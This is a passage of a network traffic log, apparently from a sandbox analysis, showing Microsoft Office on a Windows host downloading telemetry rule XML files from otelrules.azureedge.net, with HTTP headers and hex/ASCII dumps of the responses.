                                                                                                                                                                                            2024-11-20 20:05:03 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            25192.168.2.44982013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:03 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:03 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                            x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200503Z-178bfbc474bkvpdnhC1NYCuu2w00000000m00000000031wv
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:03 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            26192.168.2.44982113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:05 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:05 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                            x-ms-request-id: 79148a84-101e-0017-578c-3a47c7000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200505Z-1777c6cb7549j9hhhC1TEBzmcc00000009zg00000000dz5h
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            27192.168.2.44982213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:05 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:05 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                            x-ms-request-id: 4e7b5ce8-701e-0098-117a-3b395f000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200505Z-185f5d8b95c9mqtvhC1NYCghtc0000000ang00000001c156
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:06 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            28192.168.2.44982513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:05 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:05 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                            x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200505Z-178bfbc474bmqmgjhC1NYCy16c00000000d0000000005hzn
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:06 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            29192.168.2.44982413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:05 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:05 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                            x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200505Z-178bfbc474blv55whC1NYCpz4800000000m000000000mpsr
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:06 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            30192.168.2.44982313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:05 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:05 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                            x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200505Z-1777c6cb7549x5qchC1TEBggbg0000000a4g00000000c3kn
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            31192.168.2.44982613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:07 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:07 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                            x-ms-request-id: 7511ce5b-801e-0083-468c-3af0ae000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200507Z-1777c6cb754xlpjshC1TEBv8cc0000000a6000000000er4f
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:08 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            32192.168.2.44982813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:07 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:08 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                            x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200508Z-1777c6cb754wcxkwhC1TEB3c6w00000009zg00000000etba
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:08 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            33192.168.2.44983013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:07 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:08 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                            x-ms-request-id: a1cde93a-f01e-0020-638c-3a956b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200508Z-r1d97b99577ckpmjhC1TEBrzs000000009fg000000000p22
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:08 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            34192.168.2.44982713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:07 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:08 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
